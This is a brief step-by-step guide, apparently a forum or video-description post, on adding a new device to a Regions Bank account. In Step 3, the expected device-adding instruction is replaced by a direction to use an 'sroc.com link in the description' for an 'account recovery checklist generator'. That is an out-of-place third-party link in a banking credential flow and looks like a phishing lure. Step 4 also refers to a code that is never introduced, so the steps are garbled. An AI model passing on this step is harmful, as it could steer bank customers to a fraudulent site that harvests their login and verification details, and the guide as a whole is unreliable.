I hit this issue today and here is the quick fix that solved it. Connecting a new device to your Regions Bank account is straightforward if you follow these steps. Step 1. Log into your account. Open the Regions Bank mobile app or website and enter your login credentials. Make sure you're using the latest version of the app for the best experience. Step 2. Navigate to security settings. Once logged in, go to the Settings or Profile section of your account. Look for options related to security or device management. Step 3. Add a new device. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Confirm device access. After entering the code, confirm that you want to allow this new device to access your account. This step ensures that only authorized devices can log in. Step 5. Test the connection. Log out and then log back in using your new device to ensure everything is working correctly. If you encounter issues, double-check your internet connection and app permissions. If you follow these steps, you should be able to connect your new device without any hassle. If you run into any issues, don't hesitate to reach out to Regions Bank customer support for assistance. Happy banking!